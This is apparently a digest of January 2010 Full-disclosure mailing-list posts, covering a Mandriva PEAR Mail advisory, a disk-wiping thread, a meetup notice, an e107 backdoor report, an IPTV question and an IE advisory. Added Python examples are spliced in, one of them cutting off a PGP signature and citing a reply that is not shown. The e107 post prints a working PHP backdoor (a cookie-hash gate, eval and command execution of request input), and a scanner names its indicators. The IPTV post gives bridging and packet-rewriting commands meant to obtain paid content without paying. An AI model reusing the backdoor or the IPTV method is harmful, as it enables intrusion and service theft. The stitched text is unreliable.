Mandriva Linux Security Advisory MDVSA-2010:025
http://www.mandriva.com/security/
___

Package : php-pear-Mail
Date: January 25, 2010
Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0
___

Problem Description:

Multiple vulnerabilities were discovered and corrected in php-pear (Mail):

Argument injection vulnerability in the sendmail implementation of the Mail::Send method (Mail/sendmail.php) in the Mail package 1.1.14 for PEAR allows remote attackers to read and write arbitrary files via a crafted parameter, a different vector than CVE-2009-4111 (CVE-2009-4023).

Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023 (CVE-2009-4111).

Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.

The updated packages have been patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4023
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
___

Updated Packages:

Mandriva Linux 2008.0:
943289b9ea09700ecaf5512c50d380d3  2008.0/i586/php-pear-5.2.4-1.1mdv2008.0.noarch.rpm
f77090cf65f4ade44835a112d4fc67e0  2008.0/SRPMS/php-pear-5.2.4-1.1mdv2008.0.src.rpm

Mandriva Linux 2008.0/X86_64:
bfd61ade59779825fa62126c05f5967a  2008.0/x86_64/php-pear-5.2.4-1.1mdv2008.0.noarch.rpm
f77090cf65f4ade44835a112d4fc67e0  2008.0/SRPMS/php-pear-5.2.4-1.1mdv2008.0.src.rpm

Mandriva Linux 2009.0:
aacca8d19653ea6a82a248f604abbd0b  2009.0/i586/php-pear-5.2.6-6.1mdv2009.0.noarch.rpm
9468e00db376dab4664d665377b79fca  2009.0/SRPMS/php-pear-5.2.6-6.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
202b8122c1ec7ef90f0355f99b3c7686  2009.0/x86_64/php-pear-5.2.6-6.1mdv2009.0.noarch.rpm
9468e00db376dab4664d665377b79fca  2009.0/SRPMS/php-pear-5.2.6-6.1mdv2009.0.src.rpm

Mandriva Linux 2009.1:
2e2ae9f59bc3ac527362b5c0776236fe  2009.1/i586/php-pear-5.2.9-1.1mdv2009.1.noarch.rpm
82b814b71169f985b1b977ba60d5bd59  2009.1/SRPMS/php-pear-5.2.9-1.1mdv2009.1.src.rpm

Mandriva Linux 2009.1/X86_64:
0115517a560174cac95a19cbd17ed745  2009.1/x86_64/php-pear-5.2.9-1.1mdv2009.1.noarch.rpm
82b814b71169f985b1b977ba60d5bd59  2009.1/SRPMS/php-pear-5.2.9-1.1mdv2009.1.src.rpm

Mandriva Linux 2010.0:
6f42b2e519d40d7fa304a3dc451c1c58  2010.0/i586/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.noarch.rpm
7bb574ae5c1660a3a0cd5a2deff3586f  2010.0/SRPMS/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.src.rpm

Mandriva Linux 2010.0/X86_64:
f7401a8fdd2b526c806532fcb75271e3  2010.0/x86_64/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.noarch.rpm
7bb574ae5c1660a3a0cd5a2deff3586f  2010.0/SRPMS/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.src.rpm

Corporate 4.0:
a948abe7ef93f8e60f91d52f5e0aaee4  corporate/4.0/i586/php-pear-5.1.4-3.2.20060mlcs4.noarch.rpm
d8fca1fee69801c2b0c3de51fcb8ba8d  corporate/4.0/SRPMS/php-pear-5.1.4-3.2.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
3f1684a400312f5912cc80e235c083ec  corporate/4.0/x86_64/php-pear-5.1.4-3.2.20060mlcs4.noarch.rpm
d8fca1fee69801c2b0c3de51fcb8ba8d  corporate/4.0/SRPMS/php-pear-5.1.4-3.2.20060mlcs4.src.rpm

Mandriva Enterprise Server 5:
6bdc54b90afd9bea13d663c76efe9c3e  mes5/i586/php-pear-5.2.6-6.1mdvmes5.noarch.rpm
4bb9c64b927033aa2125a7893f29e943  mes5/SRPMS/php-pear-5.2.6-6.1mdvmes5.src.rpm

Mandriva Enterprise Server 5/X86_64:
419935609521cbfc30b4161e483bdd13  mes5/x86_64/php-pear-5.2.6-6.1mdvmes5.noarch.rpm
4bb9c64b927033aa2125a7893f29e943  mes5/SRPMS/php-pear-5.2.6-6.1mdvmes5.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8D
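The flaw class the advisory names, argument injection into a sendmail command line, arises when a caller-supplied address is pasted into a command string that a shell word-splits. The Python below is an added example and not PEAR Mail's or Mandriva's code: it places the unsafe construction next to a hardened one (argv list with no shell, a strict address grammar, rejection of any address beginning with '-', and '--' to close option parsing before the recipient list). The function names, the address regex, the sendmail path and the sample addresses are this example's own assumptions, not the patch Mandriva shipped.

```python
"""
Added example, not PEAR Mail or Mandriva code: the unsafe way to hand a
caller-supplied sender address to sendmail, next to a hardened version.
Function names, the address grammar, the sendmail path and the sample
addresses are this example's own assumptions.
"""
import re
import shlex
import subprocess

SENDMAIL = "/usr/sbin/sendmail"  # assumed path; adjust per host

# Conservative address grammar: one local part, one domain with at least one
# dot, no whitespace, quotes or angle brackets. Display names and quoted
# local parts are deliberately rejected rather than parsed.
_ADDR_RE = re.compile(
    r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
)


class InvalidAddress(ValueError):
    """Raised for anything that is not a plain, option-safe address."""


def validate_address(addr: str) -> str:
    """Return addr unchanged if it is safe to pass as a single argv element."""
    if not isinstance(addr, str) or len(addr) > 254 or not _ADDR_RE.fullmatch(addr):
        raise InvalidAddress(f"rejected address: {addr!r}")
    # The grammar allows '-' inside a local part, so check separately that the
    # value can never be read as an option, even by a parser that ignores '--'.
    if addr.startswith("-"):
        raise InvalidAddress(f"address looks like an option: {addr!r}")
    return addr


def is_valid_address(addr: str) -> bool:
    try:
        validate_address(addr)
        return True
    except InvalidAddress:
        return False


def unsafe_shell_argv(sender: str, recipients: list[str]) -> list[str]:
    """The vulnerable pattern: addresses interpolated into one command string
    that a shell will word-split. Nothing is executed here; the return value
    is how POSIX word splitting (modelled by shlex.split) would break the line
    into argv, which is exactly what an injected parameter relies on."""
    line = f"{SENDMAIL} -i -f {sender} -- {' '.join(recipients)}"
    return shlex.split(line)


def safe_argv(sender: str, recipients: list[str]) -> list[str]:
    """The hardened pattern: every address is validated and becomes its own
    argv element, so no shell ever sees it, and '--' ends option parsing
    before the recipients (assumes a getopt-style sendmail front end)."""
    sender = validate_address(sender)
    rcpts = [validate_address(r) for r in recipients]
    if not rcpts:
        raise ValueError("no recipients")
    return [SENDMAIL, "-i", "-f", sender, "--", *rcpts]


def send(sender: str, recipients: list[str], message: bytes) -> int:
    """Run sendmail with the hardened argv (shell=False) and return its exit
    status. This is the only function here that executes anything."""
    proc = subprocess.run(safe_argv(sender, recipients), input=message, check=False)
    return proc.returncode


if __name__ == "__main__":
    # Constructed sample: a sender carrying an extra, option-shaped token.
    crafted = "alice@example.com -EXTRA-OPTION /tmp/file"
    print("shell word-splits this into:", unsafe_shell_argv(crafted, ["bob@example.com"]))
    print("validator accepts it?", is_valid_address(crafted))
    print("hardened argv:", safe_argv("alice@example.com", ["bob@example.com"]))
```

The validator is intentionally stricter than RFC 5322: a mail-sending helper gains nothing from accepting exotic address forms, and every form it rejects is one less thing that can reach the MTA's option parser.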
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> - The absence of evidence 9 times out of 10 is just as bad as the
> evidence itself in court.

In what court?

> - What you type text or email can, and will, be used against you in a
> court of law.

Only if obtained by correct process of law and you resist the temptation to "explain yourself" to the police.

> So, plausible deniability solution for disk wiping?:
>
> Let, disk wiping tools LOAD the whole WIKIPEDIA in nxn matrices and
> mix ALL the words & phrases in a random pool continuously and use THIS
> as the "Wiping passes and patterns" while they wipe the disk-space
> (instead of using random-pass or zero)

You're forgetting that you aren't required to explain yourself in court (5th Amendment). It's the job of the prosecution to connect the dots and prove you're guilty. Smart defendants hire their own expert to refute the testimony of the prosecution's "expert".

As to Wikipedia, I think a random overwrite pattern would be way better than them finding fragments of the following (just two examples):

http://en.wikipedia.org/wiki/Nuclear_weapon_design
http://en.wikipedia.org/wiki/Child_prostitution

Practically every illegal act has an article on Wikipedia .. why deliberately "seed" your hard disk with them?

Cheers,

Michael Holstein
Cleveland State University
[Full-disclosure] London DEFCON January meet - DC4420 - Wed 27th Jan 2010
Hi All,

It's a new year, and we have a new venue and new rules of engagement!

First, the venue - we are back in a pub, in the heart of the west end, with a private room/bar and easy connection to mainline stations etc. Food is excellent and drinks are at *normal* pub prices (and, most importantly, they have Guinness)

Secondly, ROE: we still run on "Fight Club" rules, i.e. "you will talk", but we're going to make it a bit easier to get started...

This year, we will be limiting the talks to a single full-length 'tek/security/hacking' talk, followed by a single 'fun/other' talk, which can be any length (if it's really short, we may do two that month)...

Some previous subjects for the 'fun' talks have been:

Torches / Lasers
Home built water cannon
Interfacing live firearms to FPS games
Brain engineering (smart drugs etc.)

... you get the idea...

Meeting will always be the last Wednesday of the month, and venue is booked for the whole year, so you can get these dates in your diary (they are also on the front page of the main site - http://www.dc4420.org/)

January 27th
February 24th
March 31st
April 28th - Infosec *gulp*
May 26th
June 30th
July 28th (Social - goons will be in Vegas!)
August 25th
September 29th
October 27th
November 24th
December 15th (Social) <-- Not a Wednesday!

OK, so on to this month's details:

venue:

Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH
http://tinyurl.com/dc4420-venue

nearest stations:

Tottenham Court Road London Underground station (150m) - zone 1
Goodge Street London Underground station (440m) - zone 1
Oxford Circus London Underground station (630m) - zone 1
Leicester Square London Underground station (680m) - zone 1
Covent Garden London Underground station (750m) - zone 1

talks:

- mu-b : disk crypto stuff (the technical one)
- even + others : white hat rally (the non-technical one)

as mu-b may be late, and the rally talk may be quite short, we will also have:

- Bonus: Major Malfunction will show the latest build of http://www.alcrypto.co.uk/satmap/ (the fun one)

yes, me hunting for UAVs... :P

kickoff:

room ours from 18:00, talks start at 19:30
kitchen closes at 21:00
last orders 23:00

see you all there!

http://dc4420.org

cheers,

MM

--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...
Re: [Full-disclosure] Disk wiping -- An alternate approach?
hahaha! Ok, let an Alice/chatterbox run through your harddisk! :P

[1] http://alice.pandorabots.com/

On 1/25/10, valdis.kletni...@vt.edu wrote:
> On Mon, 25 Jan 2010 01:09:40 +0545, Bipin Gautam said:
>
>> So, plausible deniability solution for disk wiping?:
>>
>> Let, disk wiping tools LOAD the whole WIKIPEDIA in nxn matrices and
>> mix ALL the words & phrases in a random pool continuously and use THIS
>> as the "Wiping passes and patterns" while they wipe the disk-space
>> (instead of using random-pass or zero) and let the people who don't
>> need-to-know make sense of whatever they want to pull up from the
>> 'patterns' generated from the ENCYCLOPEDIA OF KNOWLEDGE & unlimited
>> keywords and phrases and counter the same?
>
> The problem is that although using Markov chains to generate pseudo-random
> text, it's usually pretty obviously pseudo-random text. And in fact, they're
> usually so random that it's pretty obvious it's just random words and doesn't
> prove anything more or less than acres of zeros.
>
> http://en.wikipedia.org/wiki/Dissociated_press
>
> The problem is that every once in a while, those things actually generate
> short chunks of intelligible text (especially when using a longer chain
> length). So now, instead of being able to say to the district attorney
>
> "The disk was full of zeros, and you can't prove what was on it before".
>
> you're now saying to him:
>
> "What do you mean, you found the phrase 'Drop the cocaine and kiddie porn off
> at my place around 9PM' on block 239349 of my hard drive?"
>
> Generally a bad idea.
[Full-disclosure] e107 latest download link is backdoored
Hi guys,

The latest version of e107, version 0.7.17 contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

I've just downloaded this file and while looking through the code, I've found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
    $out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
    ob_start();
    eval($_POST['php']);
    $out = ob_get_contents();
    ob_end_clean();
}

...

and so on.

I've informed the e107 guys about this situation.
For now, that link is not safe.

Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26

--
Bogdan Calin - bog...@acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
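A defensive follow-up to the report above, added here as an example and not code from e107 or Acunetix: a small Python scanner for the indicators this backdoor displays, namely a request parameter fed straight into eval() or a command-execution call, and a hard-coded MD5 of a cookie used as the access gate. The PHP samples embedded in it are constructed from the quoted fragment; the indicator names and the scan_php function are this example's own. A hit is a triage lead rather than proof, so a flagged file should be diffed against a known-good release copy before anyone draws conclusions.

```python
"""
Added example (not e107 or Acunetix code): scan PHP source for the web-shell
indicators visible in the class2.php fragment quoted in the report. The
samples below are constructed for this example.
"""
import re
from dataclasses import dataclass

# A superglobal subscript such as $_POST[ or $_COOKIE[ ; the tail of each
# indicator below is appended to this.
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["

# Each indicator is (name, compiled regex). They are kept simple on purpose
# so that a match is explainable to whoever has to triage it.
INDICATORS = [
    ("eval_of_request_input",
     re.compile(r"\beval\s*\(\s*" + SUPERGLOBAL)),
    ("command_exec_of_request_input",
     re.compile(r"\b(?:execute|exec|shell_exec|system|passthru|popen)\s*\(\s*"
                + SUPERGLOBAL)),
    # md5() of a cookie compared against a literal 32-hex digest: a password
    # gate that keeps the secret out of the source but leaves its fingerprint.
    ("md5_cookie_gate",
     re.compile(r"\bmd5\s*\(\s*\$_COOKIE\s*\[[^\]]*\]\s*\)\s*==+\s*[\"'][0-9a-f]{32}[\"']")),
]


@dataclass
class Finding:
    indicator: str
    line_no: int
    line: str


def scan_php(source: str) -> list[Finding]:
    """Return one Finding per (indicator, line) hit, in file order."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


# Constructed sample with the shape of the quoted class2.php fragment.
BACKDOORED_SAMPLE = """<?php
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
    if(!empty($_POST['cmd'])){
        $out = execute($_POST['cmd']);
    }
    elseif(!empty($_POST['php'])){
        ob_start();
        eval($_POST['php']);
        $out = ob_get_contents();
        ob_end_clean();
    }
}
"""

# Constructed benign sample: ordinary input handling that must not alert.
CLEAN_SAMPLE = """<?php
$page = isset($_GET['page']) ? (int)$_GET['page'] : 1;
$hash = md5($content);
"""

if __name__ == "__main__":
    for f in scan_php(BACKDOORED_SAMPLE):
        print(f"{f.indicator:32s} line {f.line_no}: {f.line}")
    print("clean sample findings:", scan_php(CLEAN_SAMPLE))
```

Run over a whole tree this is a first pass only; the durable check is the one Valery's reply hints at, comparing the downloaded archive's files and timestamps against the project's own release, since a single rewritten line in a 0.7.17 zip is easy to miss by eye.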
[Full-disclosure] Question about IPTV pentesting - packet manipulation for subscribing charged content
Hello list.

On 2010.1.14, I sent the e-mail below to the list. Then someone gave me information about netsed.

http://lcamtuf.coredump.cx/soft/netsed.tgz

It was the tool which I wanted.

Structure)

Monitor - IPTV STB - PC(attacker) - VDSL modem - internet

PC has two NICs, in bridge mode.

Ex)

ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up

And then run tcpdump

bash# tcpdump -n -i eth0
... (lots of funny stuff) ...
bash# tcpdump -n -i eth1
... (lots of funny stuff)

And I could watch IPTV normally.

Netsed has a localport. So if a packet is sent to the localport, netsed will edit this packet and forward it.

bash# netsed tcp 1 0 0 s/abc/def
       protocol localport remoteIP rPort rule

For IPTV packet forwarding to netsed's localport, run these commands.

bash# ebtables -t broute -A BROUTING -p IPv4 --ip-protocol 6 \
  --ip-destination-port 80 -j redirect --redirect-target ACCEPT
bash# iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 \
  -j REDIRECT --to-port 1

Because IPTV is on a bridge network, I use ebtables and iptables.

Finally, when IPTV wants to look for the VoD list, it sends an http packet. But netsed cannot receive the forwarded packet. So I cannot watch the VoD list.

All of this is to subscribe to charged content.

What was wrong?


Hello list.

I'm pen testing IPTV.

Example)

Monitor - IPTV STB - PC(attacker) - VDSL modem - internet

PC has two NICs. The two NICs are in bridge mode.

IPTV STB sends a request packet to find out where a specific file for playing is. To server port 8080.

POST /VoD/whereisvod.cgi
a1d1.mpg

Server's response is

HTTP/1.1 200 OK
192.168.10.10

And then IPTV STB sends an RTSP packet to 192.168.10.10. To server port 554

DESCRIBE a1d1.mpg

And play.

I wanna edit this file name. (a1d1.mpg is free, a1d2.mpg not free)

POST /VoD/whereisvod.cgi
a1d2.mpg

DESCRIBE a1d2.mpg

For this, I have to sniff packets, block them, manipulate the packet and resend.

Are there tools?
Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
"I just discovered a major flaw which affects all operating systems ever made, but I'm not saying where it is. I could get into your PC in seconds if I want to."
-- Malory the non-FD hacker

On Mon, Jan 25, 2010 at 10:28 AM, Berend-Jan Wever wrote:
> How about rebranding to ZID, as in Zero Information Disclosures?
>
> Berend-Jan Wever
> http://skypher.com/SkyLined
>
> On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures <zdi-disclosu...@tippingpoint.com> wrote:
>
>> ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update
>> Remote Code Execution Vulnerability
>> http://www.zerodayinitiative.com/advisories/ZDI-10-011
>> January 21, 2010
>>
>> [...]
Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
How about rebranding to ZID, as in Zero Information Disclosures?

Berend-Jan Wever
http://skypher.com/SkyLined

On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures <zdi-disclosu...@tippingpoint.com> wrote:

> ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update
> Remote Code Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-10-011
> January 21, 2010
>
> -- CVE ID:
> CVE-2010-0244
>
> -- Affected Vendors:
> Microsoft
>
> -- Affected Products:
> Microsoft Internet Explorer
>
> -- Vulnerability Details:
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of Microsoft Internet Explorer. User
> interaction is required to exploit this vulnerability in that the target
> must visit a malicious page.
>
> The specific flaw exists when a Col element is used within an HTML table
> container. If this element is removed while the table is in use a cache
> that exists of the table's cells will be used after one of its elements
> has been invalidated. This can lead to code execution under the context
> of the currently logged in user.
>
> -- Vendor Response:
> Microsoft has issued an update to correct this vulnerability. More
> details can be found at:
>
> http://www.microsoft.com/technet/security/Bulletin/MS10-jan.mspx
>
> -- Disclosure Timeline:
> 2009-07-14 - Vulnerability reported to vendor
> 2010-01-21 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by:
>     * wushi of team509
>
> -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents
> a best-of-breed model for rewarding security researchers for responsibly
> disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research
> through the ZDI can find more information and sign-up at:
>
>     http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is
> used. TippingPoint does not re-sell the vulnerability details or any
> exploit code. Instead, upon notifying the affected product vendor,
> TippingPoint provides its customers with zero day protection through
> its intrusion prevention technology. Explicit details regarding the
> specifics of the vulnerability are not exposed to any parties until
> an official vendor patch is publicly available. Furthermore, with the
> altruistic aim of helping to secure a broader user base, TippingPoint
> provides this vulnerability information confidentially to security
> vendors (including competitors) who have a vulnerability protection or
> mitigation product.
>
> Our vulnerability disclosure policy is available online at:
>
>     http://www.zerodayinitiative.com/advisories/disclosure_policy/